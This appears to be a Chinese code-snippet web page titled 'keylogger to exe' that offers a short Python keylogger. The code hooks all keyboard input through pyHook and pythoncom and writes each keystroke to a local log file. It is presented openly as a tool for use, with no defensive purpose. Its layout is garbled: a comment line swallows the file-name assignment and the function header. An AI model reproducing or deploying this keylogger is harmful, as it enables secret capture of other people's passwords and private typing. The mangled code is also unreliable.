📜  键盘记录器到 exe - Python 代码示例

📅  最后修改于: 2022-03-11 14:46:17.242000             🧑  作者: Mango

代码示例1
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/locationfile_log = 'keyloggeroutput.txt'def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()